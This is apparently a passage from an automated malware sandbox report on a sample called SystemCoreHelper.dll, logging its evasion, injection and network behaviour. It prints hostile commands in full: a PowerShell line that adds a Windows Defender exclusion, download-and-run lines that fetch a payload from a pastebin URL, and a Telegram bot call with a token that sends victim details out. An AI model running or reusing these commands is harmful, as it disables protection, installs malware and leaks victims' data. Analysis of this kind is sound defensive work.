Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7736	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5460	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5740	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7916	Thread sleep count: 3290 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7916	Thread sleep count: 2337 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7992	Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7556	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7572	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4852	Thread sleep count: 4801 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5936	Thread sleep count: 1963 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8164	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5064	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7544	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1144	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292	Thread sleep count: 5095 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7672	Thread sleep count: 1668 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2492	Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7704	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1308	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6948	Thread sleep count: 5382 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6940	Thread sleep count: 2532 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7060	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7092	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4444	Thread sleep time: -2767011611056431s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Last function: Thread delayed
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: aspnet_regiis.exe, 0000001A.00000002.2131149619.00000000028DC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000013.00000002.1931492047.0000000006C5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: powershell.exe, 00000028.00000002.2456306228.0000000007881000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
Source: powershell.exe, 00000011.00000002.1912945547.00000000077CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp://www.microsoft.com/pkiops/certs/Microsoft%20Time-Stamp%20PCA%202010(1).crt0
Source: powershell.exe, 00000022.00000002.2298356407.0000000007A8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2332832098.0000000007C89000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2426124372.0000000006F07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process queried: DebugPort
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process queried: DebugPort
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Process queried: DebugPort
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 26_2_025DFAC0 LdrInitializeThunk,

26_2_025DFAC0

Source: C:\Windows\Temp\zbjnkzvo4cc.exe

Code function: 24_2_68C0160A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

24_2_68C0160A

Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C02D95 mov eax, dword ptr fs:[00000030h]		24_2_68C02D95
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C03F69 mov eax, dword ptr fs:[00000030h]		24_2_68C03F69

Source: C:\Windows\Temp\zbjnkzvo4cc.exe

Code function: 24_2_68C05B7C GetProcessHeap,

24_2_68C05B7C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C01131 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_68C01131
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C0160A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_68C0160A
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C03F9A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_68C03F9A

Source: C:\Windows\SysWOW64\rundll32.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_7516.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_7664.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 3120, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 6628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 7220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7664, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.0.cs, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.0.cs, type: DROPPED

Adds a directory exclusion to Windows Defender

Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\Temp\zbjnkzvo4cc.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25A0000 protect: page execute and read and write

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"

Injects a PE file into a foreign processes

Source: C:\Windows\Temp\zbjnkzvo4cc.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25A0000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25A0000
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25A1000
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25E4000
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25E7000
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25F8000
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25F9000
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25A1000
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25E4000
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25E7000
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25F8000
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25F9000
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3C4008

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Temp\zbjnkzvo4cc.exe "C:\Windows\Temp\zbjnkzvo4cc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES42BA.tmp" "c:\Users\user\AppData\Local\Temp\1ixib5wl\CSC291E15774B6A482B9669CEACC9B56C.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Temp\mxtvcgq32fe.exe "C:\Windows\Temp\mxtvcgq32fe.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4E05.tmp" "c:\Users\user\AppData\Local\Temp\juqgin2j\CSCBFD98E15EAE94B1A9A3E8A6348847C3D.TMP"	Jump to behavior
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -command "(new-object system.net.webclient).downloadstring('https://pastebin.com/raw/nqfy14gm'); (new-object system.net.webclient).downloadfile((new-object system.net.webclient).downloadstring('https://pastebin.com/raw/nqfy14gm'), 'c:\windows\temp\zbjnkzvo4cc.exe')"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -command "(new-object system.net.webclient).downloadstring('https://pastebin.com/raw/nqfy14gm'); (new-object system.net.webclient).downloadfile((new-object system.net.webclient).downloadstring('https://pastebin.com/raw/nqfy14gm'), 'c:\windows\temp\mxtvcgq32fe.exe')"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -command "(new-object system.net.webclient).downloadstring('https://pastebin.com/raw/nqfy14gm'); (new-object system.net.webclient).downloadfile((new-object system.net.webclient).downloadstring('https://pastebin.com/raw/nqfy14gm'), 'c:\windows\temp\zbjnkzvo4cc.exe')"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -command "(new-object system.net.webclient).downloadstring('https://pastebin.com/raw/nqfy14gm'); (new-object system.net.webclient).downloadfile((new-object system.net.webclient).downloadstring('https://pastebin.com/raw/nqfy14gm'), 'c:\windows\temp\mxtvcgq32fe.exe')"	Jump to behavior

Source: C:\Windows\Temp\zbjnkzvo4cc.exe

Code function: 24_2_68C017D8 cpuid

24_2_68C017D8

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\Desktop\SystemCoreHelper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
